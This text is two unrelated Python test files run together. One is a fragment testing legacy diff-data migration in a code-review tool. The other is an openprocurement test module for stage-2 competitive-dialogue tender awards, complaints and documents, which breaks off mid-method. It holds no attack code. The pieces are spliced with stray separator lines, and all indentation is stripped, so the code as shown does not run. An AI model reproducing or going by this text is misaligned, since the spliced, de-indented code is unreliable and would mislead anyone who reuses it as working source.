self.assertIsNone(self.filediff.parent_diff)
self.assertIsNone(self.filediff.parent_diff_hash)
def test_migration_by_shared_legacy_diff_hash(self):
"""Testing RawFileDiffData migration accessing FileDiff.diff
with associated shared LegacyFileDiffData
"""
legacy = LegacyFileDiffData.objects.create(
binary_hash='abc123',
binary=Base64DecodedValue(self.DEFAULT_GIT_FILEDIFF_DATA_DIFF))
self.filediff.legacy_diff_hash = legacy
self.filediff.save()
# Create a second FileDiff using this legacy data.
diffset = DiffSet.objects.create(name='test',
revision=1,
repository=self.repository)
FileDiff.objects.create(source_file='README',
dest_file='README',
diffset=diffset,
diff64=b'',
parent_diff64=b'',
legacy_diff_hash=legacy)
# This should prompt the migration.
diff = self.filediff.diff
self.assertIsNotNone(self.filediff.diff_hash)
self.assertIsNone(self.filediff.parent_diff_hash)
self.assertIsNone(self.filediff.legacy_diff_hash)
self.assertEqual(LegacyFileDiffData.objects.count(), 1)
self.assertEqual(diff, self.DEFAULT_GIT_FILEDIFF_DATA_DIFF)
self.assertEqual(self.filediff.diff64, b'')
self.assertEqual(self.filediff.diff_hash.content,
self.DEFAULT_GIT_FILEDIFF_DATA_DIFF)
self.assertEqual(self.filediff.diff, diff)
self.assertIsNone(self.filediff.parent_diff)
self.assertIsNone(self.filediff.parent_diff_hash)
def test_migration_by_legacy_parent_diff_hash(self):
"""Testing RawFileDiffData migration accessing FileDiff.parent_diff
with associated LegacyFileDiffData
"""
legacy = LegacyFileDiffData.objects.create(
binary_hash='abc123',
binary=Base64DecodedValue(self.parent_diff))
self.filediff.legacy_parent_diff_hash = legacy
self.filediff.save()
# This should prompt the migration.
parent_diff = self.filediff.parent_diff
self.assertIsNotNone(self.filediff.parent_diff_hash)
self.assertIsNone(self.filediff.legacy_parent_diff_hash)
self.assertEqual(parent_diff, self.parent_diff)
self.assertEqual(self.filediff.parent_diff64, b'')
self.assertEqual(self.filediff.parent_diff_hash.content,
self.parent_diff)
self.assertEqual(self.filediff.parent_diff, parent_diff)
def test_migration_by_shared_legacy_parent_diff_hash(self):
"""Testing RawFileDiffData migration accessing FileDiff.parent_diff
with associated shared LegacyFileDiffData
"""
legacy = LegacyFileDiffData.objects.create(
binary_hash='abc123',
binary=Base64DecodedValue(self.parent_diff))
self.filediff.legacy_parent_diff_hash = legacy
self.filediff.save()
# Create a second FileDiff using this legacy data.
diffset = DiffSet.objects.create(name='test',
revision=1,
repository=self.repository)
FileDiff.objects.create(source_file='README',
dest_file='README',
diffset=diffset,
diff64=b'',
parent_diff64=b'',
legacy_parent_diff_hash=legacy)
# This should prompt the migration.
parent_diff = self.filediff.parent_diff
self.assertIsNotNone(self.filediff.parent_diff_hash)
self.assertIsNone(self.filediff.legacy_parent_diff_hash)
self.assertEqual(LegacyFileDiffData.objects.count(), 1)
self.assertEqual(parent_diff, self.parent_diff)
self.assertEqual(self.filediff.parent_diff64, b'')
self.assertEqual(self.filediff.parent_diff_hash.content,
self.parent_diff)
self.assertEqual(self.filediff.parent_diff, parent_diff)
def test_migration_with_legacy_and_race_condition(self):
"""Testing RawFileDiffData migration with LegacyFileDiffData and race
condition in migrating
"""
legacy = LegacyFileDiffData.objects.create(
binary_hash='abc123',
binary=Base64DecodedValue(self.DEFAULT_GIT_FILEDIFF_DATA_DIFF))
parent_legacy = LegacyFileDiffData.objects.create(
binary_hash='def456',
binary=Base64DecodedValue(self.parent_diff))
filediff1 = self.filediff
filediff1.legacy_diff_hash = legacy
filediff1.legacy_parent_diff_hash = parent_legacy
filediff1.save()
filediff2 = FileDiff.objects.get(pk=filediff1.pk)
# Make sure that we're in the expected state.
self.assertEqual(filediff1.legacy_diff_hash_id, legacy.pk)
self.assertEqual(filediff1.legacy_parent_diff_hash_id,
parent_legacy.pk)
self.assertEqual(filediff2.legacy_diff_hash_id, legacy.pk)
self.assertEqual(filediff2.legacy_parent_diff_hash_id,
parent_legacy.pk)
# This should prompt the migration of the first instance.
diff1 = self.filediff.diff
parent_diff1 = filediff1.parent_diff
# This should prompt the migration of the second instance.
diff2 = filediff2.diff
parent_diff2 = filediff2.parent_diff
# At this point, we should have valid diffs, and neither call
# above should have raised an exception due to a dangling hash ID.
self.assertEqual(diff1, self.DEFAULT_GIT_FILEDIFF_DATA_DIFF)
self.assertEqual(diff1, diff2)
self.assertEqual(parent_diff1, self.parent_diff)
self.assertEqual(parent_diff1, parent_diff2)
self.assertEqual(LegacyFileDiffData.objects.count(), 0)
self.assertEqual(RawFileDiffData.objects.count(), 2)
# Check the hash references.
self.assertIsNotNone(filediff1.diff_hash)
self.assertIsNotNone(filediff2.diff_hash)
self.assertEqual(filediff1.diff_hash, filediff2.diff_hash)
self.assertIsNotNone(filediff1.parent_diff_hash)
self.assertIsNotNone(filediff2.parent_diff_hash)
self.assertEqual(filediff1.parent_diff_hash,
filediff2.parent_diff_hash)
self.assertIsNone(filediff1.legacy_diff_hash)
self.assertIsNone(filediff2.legacy_diff_hash)
self.assertIsNone(filediff1.legacy_parent_diff_hash)
self.assertIsNone(filediff2.legacy_parent_diff_hash)
# Check the diff content.
self.assertEqual(filediff1.diff64, b'')
self.assertEqual(filediff2.diff64, b'')
self.assertEqual(filediff1.diff_hash.content,
self.DEFAULT_GIT_FILEDIFF_DATA_DIFF)
self.assertEqual(filediff2.diff_hash.content,
self.DEFAULT_GIT_FILEDIFF_DATA_DIFF)
# Check the parent_diff content.
self.assertEqual(filediff1.parent_diff64, b'')
self.assertEqual(filediff2.parent_diff64, b'')
self.assertEqual(filediff1.parent_diff_hash.content, self.parent_diff)
self.assertEqual(filediff2.parent_diff_hash.content, self.parent_diff)
|
|
# -*- coding: utf-8 -*-
import unittest
from copy import deepcopy
from openprocurement.api.tests.base import (
snitch
)
from openprocurement.tender.belowthreshold.tests.award import (
TenderAwardComplaintResourceTestMixin,
TenderAwardComplaintDocumentResourceTestMixin,
TenderAwardDocumentResourceTestMixin,
Tender2LotAwardDocumentResourceTestMixin,
)
from openprocurement.tender.belowthreshold.tests.award_blanks import (
# TenderLotAwardComplaintResourceTest
get_tender_lot_award_complaint,
get_tender_lot_award_complaints,
# Tender2LotAwardComplaintDocumentResourceTest
create_tender_lots_award_complaint_document,
)
from openprocurement.tender.openua.tests.award import (
TenderUaAwardComplaintResourceTestMixin,
TenderAwardResourceTestMixin
)
from openprocurement.tender.openua.tests.award_blanks import (
# TenderAwardResourceTest
create_tender_award,
patch_tender_award,
patch_tender_award_active,
patch_tender_award_unsuccessful,
# TenderAwardComplaintDocumentResourceTest
patch_tender_award_complaint_document as patch_tender_award_complaint_document_from_ua,
# TenderLotAwardResourceTest
create_tender_lot_award,
patch_tender_lot_award,
patch_tender_lot_award_unsuccessful,
# Tender2LotAwardComplaintResourceTest
create_tender_lots_award,
patch_tender_lots_award,
# TenderLotAwardComplaintResourceTest
create_tender_lot_award_complaint,
patch_tender_lot_award_complaint,
# Tender2LotAwardComplaintResourceTest
create_tender_lots_award_complaint,
patch_tender_lots_award_complaint,
# Tender2LotAwardComplaintDocumentResourceTest
put_tender_lots_award_complaint_document,
patch_tender_lots_award_complaint_document,
)
from openprocurement.tender.openeu.tests.award import (
TenderAwardResourceTestMixin,
TenderLotAwardResourceTestMixin,
Tender2LotAwardResourceTestMixin,
TenderLotAwardComplaintResourceTestMixin,
Tender2LotAwardComplaintResourceTestMixin,
)
from openprocurement.tender.competitivedialogue.tests.base import (
BaseCompetitiveDialogEUStage2ContentWebTest,
BaseCompetitiveDialogUAStage2ContentWebTest,
test_bids,
test_lots,
author
)
from openprocurement.tender.competitivedialogue.tests.stage2.award_blanks import (
# TenderAwardCompaintDocument EU
create_tender_award_complaint_document,
put_tender_award_complaint_document,
patch_tender_award_complaint_document,
# TenderAwardResourseTest UA
create_tender_award_invalid,
get_tender_award,
patch_tender_award_Administrator_change,
# TenderAwardComplaintDocumentResourceTest
patch_tender_award_complaint_document,
)
test_tender_bids = deepcopy(test_bids[:2])
for test_bid in test_tender_bids:
test_bid['tenderers'] = [author]
class TenderStage2EUAwardResourceTest(BaseCompetitiveDialogEUStage2ContentWebTest,
TenderAwardResourceTestMixin):
initial_status = 'active.tendering'
initial_bids = test_tender_bids
initial_lots = test_lots
initial_auth = ('Basic', ('broker', ''))
expected_award_amount = initial_bids[0]['value']['amount']
def setUp(self):
""" Create tender with lots add 2 bids, play auction and get award """
super(TenderStage2EUAwardResourceTest, self).setUp()
# switch to active.pre-qualification
self.set_status('active.pre-qualification', {'id': self.tender_id, 'status': 'active.tendering'})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {'data': {'id': self.tender_id}})
self.assertEqual(response.json['data']['status'], 'active.pre-qualification')
# qualify bids
response = self.app.get('/tenders/{}/qualifications'.format(self.tender_id))
self.app.authorization = ('Basic', ('broker', ''))
for qualification in response.json['data']:
response = self.app.patch_json('/tenders/{}/qualifications/{}?acc_token={}'.format(
self.tender_id, qualification['id'], self.tender_token),
{'data': {'status': 'active', 'qualified': True, 'eligible': True}})
self.assertEqual(response.status, '200 OK')
# switch to active.pre-qualification.stand-still
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(self.tender_id, self.tender_token),
{'data': {'status': 'active.pre-qualification.stand-still'}})
self.assertEqual(response.json['data']['status'], 'active.pre-qualification.stand-still')
# switch to active.auction time
self.set_status('active.auction', {'id': self.tender_id, 'status': 'active.pre-qualification.stand-still'})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {'data': {'id': self.tender_id}})
self.assertEqual(response.json['data']['status'], 'active.auction')
# switch to auction role
self.app.authorization = ('Basic', ('auction', ''))
response = self.app.get('/tenders/{}/auction'.format(self.tender_id))
auction_bids_data = response.json['data']['bids']
for lot_id in self.lots:
response = self.app.post_json('/tenders/{}/auction/{}'.format(self.tender_id, lot_id['id']),
{'data': {'bids': auction_bids_data}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
response = self.app.get('/tenders/{}'.format(self.tender_id))
self.assertEqual(response.json['data']['status'], 'active.qualification')
# get award
response = self.app.get('/tenders/{}/awards'.format(self.tender_id))
self.award_id = response.json['data'][0]['id']
self.bid_token = self.initial_bids_tokens[self.bids[0]['id']]
self.app.authorization = ('Basic', ('broker', ''))
class TenderStage2EULotAwardResourceTest(BaseCompetitiveDialogEUStage2ContentWebTest,
TenderLotAwardResourceTestMixin):
initial_status = 'active.tendering'
initial_bids = test_tender_bids
initial_lots = test_lots
initial_auth = ('Basic', ('broker', ''))
expected_award_amount = test_bids[0]['value']['amount']
def setUp(self):
super(TenderStage2EULotAwardResourceTest, self).setUp()
# switch to active.pre-qualification
self.set_status('active.pre-qualification', {'id': self.tender_id, 'status': 'active.tendering'})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(
self.tender_id), {'data': {'id': self.tender_id}})
self.assertEqual(response.json['data']['status'], 'active.pre-qualification')
# qualify bids
response = self.app.get('/tenders/{}/qualifications'.format(self.tender_id))
self.app.authorization = ('Basic', ('broker', ''))
for qualification in response.json['data']:
response = self.app.patch_json('/tenders/{}/qualifications/{}?acc_token={}'.format(
self.tender_id, qualification['id'], self.tender_token),
{'data': {'status': 'active', 'qualified': True, 'eligible': True}})
self.assertEqual(response.status, '200 OK')
# switch to active.pre-qualification.stand-still
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(
self.tender_id, self.tender_token),
{'data': {'status': 'active.pre-qualification.stand-still'}})
self.assertEqual(response.json['data']['status'], 'active.pre-qualification.stand-still')
# switch to active.auction
self.set_status('active.auction', {'id': self.tender_id, 'status': 'active.pre-qualification.stand-still'})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {'data': {'id': self.tender_id}})
self.assertEqual(response.json['data']['status'], 'active.auction')
self.app.authorization = ('Basic', ('auction', ''))
response = self.app.get('/tenders/{}/auction'.format(self.tender_id))
auction_bids_data = response.json['data']['bids']
for lot_id in self.lots:
response = self.app.post_json('/tenders/{}/auction/{}'.format(self.tender_id, lot_id['id']),
{'data': {'bids': auction_bids_data}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
response = self.app.get('/tenders/{}'.format(self.tender_id))
self.assertEqual(response.json['data']['status'], 'active.qualification')
# Get award
response = self.app.get('/tenders/{}/awards'.format(self.tender_id))
self.award_id = response.json['data'][0]['id']
self.bid_token = self.initial_bids_tokens[self.bids[0]['id']]
self.app.authorization = ('Basic', ('broker', ''))
class TenderStage2EU2LotAwardResourceTest(BaseCompetitiveDialogEUStage2ContentWebTest,
Tender2LotAwardResourceTestMixin):
initial_status = 'active.tendering'
initial_lots = deepcopy(2 * test_lots)
initial_bids = test_tender_bids
initial_auth = ('Basic', ('broker', ''))
def setUp(self):
super(TenderStage2EU2LotAwardResourceTest, self).setUp()
# switch to active.pre-qualification
self.set_status('active.pre-qualification', {'id': self.tender_id, 'status': 'active.tendering'})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {'data': {'id': self.tender_id}})
self.assertEqual(response.json['data']['status'], 'active.pre-qualification')
# qualify bids
response = self.app.get('/tenders/{}/qualifications'.format(self.tender_id))
self.app.authorization = ('Basic', ('broker', ''))
for qualification in response.json['data']:
response = self.app.patch_json('/tenders/{}/qualifications/{}?acc_token={}'.format(
self.tender_id, qualification['id'], self.tender_token),
{'data': {'status': 'active', 'qualified': True, 'eligible': True}})
self.assertEqual(response.status, '200 OK')
# switch to active.pre-qualification.stand-still
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(
self.tender_id, self.tender_token), {'data': {'status': 'active.pre-qualification.stand-still'}})
self.assertEqual(response.json['data']['status'], 'active.pre-qualification.stand-still')
# switch to active.auction
self.set_status('active.auction', {'id': self.tender_id, 'status': 'active.pre-qualification.stand-still'})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {'data': {'id': self.tender_id}})
self.assertEqual(response.json['data']['status'], 'active.auction')
self.app.authorization = ('Basic', ('auction', ''))
response = self.app.get('/tenders/{}/auction'.format(self.tender_id))
auction_bids_data = response.json['data']['bids']
for lot_id in self.lots:
response = self.app.post_json('/tenders/{}/auction/{}'.format(self.tender_id, lot_id['id']),
{'data': {'bids': auction_bids_data}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
response = self.app.get('/tenders/{}'.format(self.tender_id))
self.assertEqual(response.json['data']['status'], 'active.qualification')
# Get award
response = self.app.get('/tenders/{}/awards'.format(self.tender_id))
self.award_id = response.json['data'][0]['id']
self.app.authorization = ('Basic', ('broker', ''))
class TenderStage2EUAwardComplaintResourceTest(BaseCompetitiveDialogEUStage2ContentWebTest,
TenderAwardComplaintResourceTestMixin,
TenderUaAwardComplaintResourceTestMixin):
initial_status = 'active.tendering'
initial_bids = test_tender_bids
initial_lots = deepcopy(2 * test_lots)
initial_auth = ('Basic', ('broker', ''))
def setUp(self):
super(TenderStage2EUAwardComplaintResourceTest, self).setUp()
# switch to active.pre-qualification
self.set_status('active.pre-qualification', {'id': self.tender_id, 'status': 'active.tendering'})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {'data': {'id': self.tender_id}})
self.assertEqual(response.json['data']['status'], 'active.pre-qualification')
# qualify bids
response = self.app.get('/tenders/{}/qualifications'.format(self.tender_id))
self.app.authorization = ('Basic', ('broker', ''))
for qualification in response.json['data']:
response = self.app.patch_json('/tenders/{}/qualifications/{}?acc_token={}'.format(
self.tender_id, qualification['id'], self.tender_token),
{'data': {'status': 'active', 'qualified': True, 'eligible': True}})
self.assertEqual(response.status, '200 OK')
# switch to active.pre-qualification.stand-still
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(self.tender_id, self.tender_token),
{'data': {'status': 'active.pre-qualification.stand-still'}})
self.assertEqual(response.json['data']['status'], 'active.pre-qualification.stand-still')
# switch to active.auction
self.set_status('active.auction', {'id': self.tender_id, 'status': 'active.pre-qualification.stand-still'})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {'data': {'id': self.tender_id}})
self.assertEqual(response.json['data']['status'], 'active.auction')
self.app.authorization = ('Basic', ('auction', ''))
response = self.app.get('/tenders/{}/auction'.format(self.tender_id))
auction_bids_data = response.json['data']['bids']
for lot_id in self.lots:
response = self.app.post_json('/tenders/{}/auction/{}'.format(self.tender_id, lot_id['id']),
{'data': {'bids': auction_bids_data}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
response = self.app.get('/tenders/{}'.format(self.tender_id))
self.assertEqual(response.json['data']['status'], 'active.qualification')
# Get award
response = self.app.get('/tenders/{}/awards'.format(self.tender_id))
self.award_id = response.json['data'][0]['id']
self.app.authorization = ('Basic', ('broker', ''))
self.app.patch_json('/tenders/{}/awards/{}?acc_token={}'.format(self.tender_id, self.award_id, self.tender_token), {'data': {'status': 'active', "qualified": True, "eligible": True}})
self.bid_token = self.initial_bids_tokens[self.bids[0]['id']]
self.app.authorization = ('Basic', ('broker', ''))
class TenderStage2EULotAwardComplaintResourceTest(BaseCompetitiveDialogEUStage2ContentWebTest,
TenderLotAwardComplaintResourceTestMixin):
initial_status = 'active.tendering'
initial_lots = deepcopy(test_lots)
initial_bids = test_tender_bids
initial_auth = ('Basic', ('broker', ''))
def setUp(self):
super(TenderStage2EULotAwardComplaintResourceTest, self).setUp()
# switch to active.pre-qualification
self.set_status('active.pre-qualification', {'id': self.tender_id, 'status': 'active.tendering'})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {'data': {'id': self.tender_id}})
self.assertEqual(response.json['data']['status'], 'active.pre-qualification')
# qualify bids
response = self.app.get('/tenders/{}/qualifications'.format(self.tender_id))
self.app.authorization = ('Basic', ('broker', ''))
for qualification in response.json['data']:
response = self.app.patch_json('/tenders/{}/qualifications/{}?acc_token={}'.format(
self.tender_id, qualification['id'], self.tender_token),
{'data': {'status': 'active', 'qualified': True, 'eligible': True}})
self.assertEqual(response.status, '200 OK')
# switch to active.pre-qualification.stand-still
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(self.tender_id, self.tender_token),
{'data': {'status': 'active.pre-qualification.stand-still'}})
self.assertEqual(response.json['data']['status'], 'active.pre-qualification.stand-still')
# switch to active.auction
self.set_status('active.auction', {'id': self.tender_id, 'status': 'active.pre-qualification.stand-still'})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {'data': {'id': self.tender_id}})
self.assertEqual(response.json['data']['status'], 'active.auction')
self.app.authorization = ('Basic', ('auction', ''))
response = self.app.get('/tenders/{}/auction'.format(self.tender_id))
auction_bids_data = response.json['data']['bids']
for lot_id in self.lots:
response = self.app.post_json('/tenders/{}/auction/{}'.format(self.tender_id, lot_id['id']),
{'data': {'bids': auction_bids_data}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
response = self.app.get('/tenders/{}'.format(self.tender_id))
self.assertEqual(response.json['data']['status'], 'active.qualification')
# Create award
self.app.authorization = ('Basic', ('token', ''))
bid = self.bids[0]
response = self.app.post_json('/tenders/{}/awards'.format(self.tender_id),
{'data': {'suppliers': [author],
'status': 'pending',
'bid_id': bid['id'],
'lotID': bid['lotValues'][0]['relatedLot']}})
award = response.json['data']
self.award_id = award['id']
self.app.patch_json('/tenders/{}/awards/{}'.format(self.tender_id, self.award_id), {'data': {'status': 'active', "qualified": True, "eligible": True}})
self.bid_token = self.initial_bids_tokens[self.bids[0]['id']]
self.app.authorization = ('Basic', ('broker', ''))
class TenderStage2EU2LotAwardComplaintResourceTest(TenderStage2EULotAwardComplaintResourceTest,
Tender2LotAwardComplaintResourceTestMixin):
initial_lots = deepcopy(2 * test_lots)
class TenderStage2EUAwardComplaintDocumentResourceTest(BaseCompetitiveDialogEUStage2ContentWebTest,
TenderAwardComplaintDocumentResourceTestMixin):
initial_status = 'active.qualification'
initial_bids = test_tender_bids
def setUp(self):
super(TenderStage2EUAwardComplaintDocumentResourceTest, self).setUp()
# Create award
self.app.authorization = ('Basic', ('token', ''))
response = self.app.post_json('/tenders/{}/awards'.format(self.tender_id),
{'data': {'suppliers': [author],
'status': 'pending',
'bid_id': self.bids[0]['id']}})
award = response.json['data']
self.award_id = award['id']
self.app.patch_json('/tenders/{}/awards/{}'.format(self.tender_id, self.award_id), {'data': {'status': 'active', "qualified": True, "eligible": True}})
# Create complaint for award
response = self.app.post_json('/tenders/{}/awards/{}/complaints'.format(self.tender_id, self.award_id),
{'data': {'title': 'complaint title',
'description': 'complaint description',
'author': author}})
complaint = response.json['data']
self.complaint_id = complaint['id']
self.complaint_owner_token = response.json['access']['token']
test_patch_tender_award_complaint_document = snitch(patch_tender_award_complaint_document_from_ua)
class TenderStage2EU2LotAwardComplaintDocumentResourceTest(BaseCompetitiveDialogEUStage2ContentWebTest):
initial_status = 'active.qualification'
initial_bids = test_tender_bids
initial_lots = deepcopy(2 * test_lots)
def setUp(self):
super(TenderStage2EU2LotAwardComplaintDocumentResourceTest, self).setUp()
# Create award
bid = self.bids[0]
self.app.authorization = ('Basic', ('token', ''))
self.app.post_json('/tenders/{}/awards'.format(self.tender_id),
{'data': {'suppliers': [author], 'status': 'pending', 'bid_id': bid['id'], 'lotID': bid['lotValues'][1]['relatedLot']}})
response = self.app.post_json('/tenders/{}/awards'.format(self.tender_id),
{'data': {'suppliers': [author], 'status': 'pending',
'bid_id': bid['id'], 'lotID': bid['lotValues'][0]['relatedLot']}})
award = response.json['data']
self.award_id = award['id']
self.app.patch_json('/tenders/{}/awards/{}'.format(self.tender_id, self.award_id), {'data': {'status': 'active', "qualified": True, "eligible": True}})
# Create complaint for award
response = self.app.post_json('/tenders/{}/awards/{}/complaints'.format(self.tender_id, self.award_id),
{'data': {'title': 'complaint title',
'description': 'complaint description',
'author': author}})
complaint = response.json['data']
self.complaint_id = complaint['id']
self.complaint_owner_token = response.json['access']['token']
test_create_tender_award_complaint_document = snitch(create_tender_award_complaint_document)
test_put_tender_award_complaint_document = snitch(put_tender_award_complaint_document)
test_patch_tender_award_complaint_document = snitch(patch_tender_award_complaint_document)
class TenderStage2EUAwardDocumentResourceTest(BaseCompetitiveDialogEUStage2ContentWebTest,
TenderAwardDocumentResourceTestMixin):
initial_status = 'active.qualification'
initial_bids = test_tender_bids
def setUp(self):
super(TenderStage2EUAwardDocumentResourceTest, self).setUp()
# Create award
self.app.authorization = ('Basic', ('token', ''))
response = self.app.post_json('/tenders/{}/awards'.format(self.tender_id),
{'data': {'suppliers': [author],
'status': 'pending',
'bid_id': self.bids[0]['id']}})
award = response.json['data']
self.award_id = award['id']
class TenderStage2EU2LotAwardDocumentResourceTest(BaseCompetitiveDialogEUStage2ContentWebTest,
Tender2LotAwardDocumentResourceTestMixin):
initial_status = 'active.qualification'
initial_bids = test_tender_bids
initial_lots = deepcopy(2 * test_lots)
def setUp(self):
super(TenderStage2EU2LotAwardDocumentResourceTest, self).setUp()
# Create award
bid = self.bids[0]
self.app.authorization = ('Basic', ('token', ''))
response = self.app.post_json('/tenders/{}/awards'.format(self.tender_id),
{'data': {'suppliers': [author], 'status': 'pending',
'bid_id': bid['id'], 'lotID': bid['lotValues'][0]['relatedLot']}})
award = response.json['data']
self.award_id = award['id']
# UA
class TenderStage2UAAwardResourceTest(BaseCompetitiveDialogUAStage2ContentWebTest):
initial_status = 'active.qualification'
initial_bids = test_tender_bids
test_create_tender_award = snitch(create_tender_award)
test_patch_tender_award = snitch(patch_tender_award)
test_patch_tender_award_active = snitch(patch_tender_award_active)
test_patch_tender_award_unsuccessful = snitch(patch_tender_award_unsuccessful)
test_create_tender_award_invalid = snitch(create_tender_award_invalid)
test_get_tender_award = snitch(get_tender_award)
test_patch_tender_award_Administrator_change = snitch(patch_tender_award_Administrator_change)
class TenderStage2UALotAwardResourceTest(BaseCompetitiveDialogUAStage2ContentWebTest):
initial_status = 'active.qualification'
initial_lots = deepcopy(test_lots)
initial_bids = test_tender_bids
test_create_lot_award = snitch(create_tender_lot_award)
test_patch_tender_lot_award = snitch(patch_tender_lot_award)
test_patch_tender_lot_award_unsuccessful = snitch(patch_tender_lot_award_unsuccessful)
class TenderStage2UA2LotAwardResourceTest(BaseCompetitiveDialogUAStage2ContentWebTest):
initial_status = 'active.qualification'
initial_lots = deepcopy(2 * test_lots)
initial_bids = test_tender_bids
test_create_tender_lots_award = snitch(create_tender_lots_award)
test_patch_tender_lots_award = snitch(patch_tender_lots_award)
class TenderStage2UAAwardComplaintResourceTest(BaseCompetitiveDialogUAStage2ContentWebTest,
TenderAwardComplaintResourceTestMixin,
TenderUaAwardComplaintResourceTestMixin):
initial_status = 'active.qualification'
initial_bids = test_tender_bids
def setUp(self):
super(TenderStage2UAAwardComplaintResourceTest, self).setUp()
# Create award
auth = self.app.authorization
self.app.authorization = ('Basic', ('token', ''))
response = self.app.post_json('/tenders/{}/awards'.format(self.tender_id),
{'data': {'suppliers': [author],
'status': 'pending',
'bid_id': self.bids[0]['id']}})
award = response.json['data']
self.award_id = award['id']
self.app.patch_json('/tenders/{}/awards/{}'.format(self.tender_id, self.award_id), {'data': {'status': 'active', "qualified": True, "eligible": True}})
self.app.authorization = auth
self.bid_token = self.initial_bids_tokens[self.bids[0]['id']]
class TenderStage2UALotAwardComplaintResourceTest(BaseCompetitiveDialogUAStage2ContentWebTest):
initial_status = 'active.qualification'
initial_lots = deepcopy(test_lots)
initial_bids = test_tender_bids
def setUp(self):
super(TenderStage2UALotAwardComplaintResourceTest, self).setUp()
# Create award
bid = self.bids[0]
auth = self.app.authorization
self.app.authorization = ('Basic', ('token', ''))
response = self.app.post_json('/tenders/{}/awards'.format(self.tender_id),
{'data': {'suppliers': [author], 'status': 'pending',
'bid_id': bid['id'], 'lotID': bid['lotValues'][0]['relatedLot']}})
award = response.json['data']
self.award_id = award['id']
self.app.patch_json('/tenders/{}/awards/{}'.format(self.tender_id, self.award_id), {'data': {'status': 'active', "qualified": True, "eligible": True}})
self.bid_token = self.initial_bids_tokens[self.bids[0]['id']]
self.app.authorization = auth
test_create_tender_lot_award_complaint = snitch(create_tender_lot_award_complaint)
test_patch_tender_lot_award_complaint = snitch(patch_tender_lot_award_complaint)
test_get_tender_lot_award_complaint = snitch(get_tender_lot_award_complaint)
test_get_tender_lot_award_complaints = snitch(get_tender_lot_award_complaints)
class Tender2LotAwardComplaintResourceTest(TenderStage2UALotAwardComplaintResourceTest):
initial_lots = deepcopy(2 * test_lots)
test_create_tender_lots_award_complaint = snitch(create_tender_lots_award_complaint)
test_patch_tender_lots_award_complaint = snitch(patch_tender_lots_award_complaint)
class TenderStage2UAAwardComplaintDocumentResourceTest(BaseCompetitiveDialogUAStage2ContentWebTest,
TenderAwardComplaintDocumentResourceTestMixin):
initial_status = 'active.qualification'
initial_bids = test_tender_bids
def setUp(self):
super(TenderStage2UAAwardComplaintDocumentResourceTest, self).setUp()
# Create award
auth = self.app.authorization
self.app.authorization = ('Basic', ('token', ''))
response = self.app.post_json('/tenders/{}/awards'.format(self.tender_id),
{'data': {'suppliers': [author],
'status': 'pending',
'bid_id': self.bids[0]['id']}})
award = response.json['data']
self.award_id = award['id']
self.app.patch_json('/tenders/{}/awards/{}'.format(self.tender_id, self.award_id), {'data': {'status': 'active', "qualified": True, "eligible": True}})
self.app.authorization = auth
# Create complaint for award
bid_token = self.initial_bids_tokens[self.bids[0]['id']]
response = self.app.post_json('/tenders/{}/awards/{}/complaints?acc_token={}'.format(
self.tender_id, self.award_id, bid_token),
{'data': {'title': 'complaint title',
'description': 'complaint description',
'author': author}})
complaint = response.json['data']
self.complaint_id = complaint['id']
self.complaint_owner_token = response.json['access']['token']
test_patch_tender_award_complaint_document = snitch(patch_tender_award_complaint_document)
class TenderStage2UA2LotAwardComplaintDocumentResourceTest(BaseCompetitiveDialogUAStage2ContentWebTest):
initial_status = 'active.qualification'
initial_bids = test_tender_bids
initial_lots = deepcopy(2 * test_lots)
def setUp(self):
super(TenderStage2UA2LotAwardComplaintDocumentResourceTest, self).setUp()
# Create award
bid = self.bids[0]
bid_token = self.initial_bids_tokens[self.bids[0]['id']]
auth = self.app.authorization
self.app.authorization = ('Basic', ('token', ''))
response = self.app.post_json('/tenders/{}/awards'.format(self.tender_id),
{'data': {'suppliers': [author], 'status': 'pending',
'bid_id': bid['id'], 'lotID': bid['lotValues'][0]['relatedLot']}})
award = response.json['data']
self.award_id = award['id']
self.app.patch_json('/tenders/{}/awards/{}'.format(self.tender_id, self.award_id), {'data': {'status': 'active', "qualified": True, "eligible": True}})
self.app.authorization = auth
# Create complaint for award
response = self.app.post_json('/tenders/{}/awards/{}/complaints?acc_token={}'.format(
self.tender_id, self.award_id, bid_token),
{'data': {'title': 'complaint title', 'description': 'complaint description', 'author': author}})
complaint = response.json['data']
self.complaint_id = complaint['id']
self.complaint_owner_token = response.json['access']['token']
test_create_tender_lots_award_document = snitch(create_tender_lots_award_complaint_document)
test_put_tender_lots_award_complaint_document = snitch(put_tender_lots_award_complaint_document)
test_patch_tender_lots_award_complaint_document = snitch(patch_tender_lots_award_complaint_document)
class TenderStage2UAAwardDocumentResourceTest(BaseCompetitiveDialogUAStage2ContentWebTest,
TenderAwardDocumentResourceTestMixin):
initial_status = 'active.qualification'
initial_bids = test_tender_bids
def setUp(self):
super(TenderStage2UAAwardDocumentResourceTest, self).setUp()
# Create award
auth = self.app.authorization
self.app.authorization = ('Basic', ('token', ''))
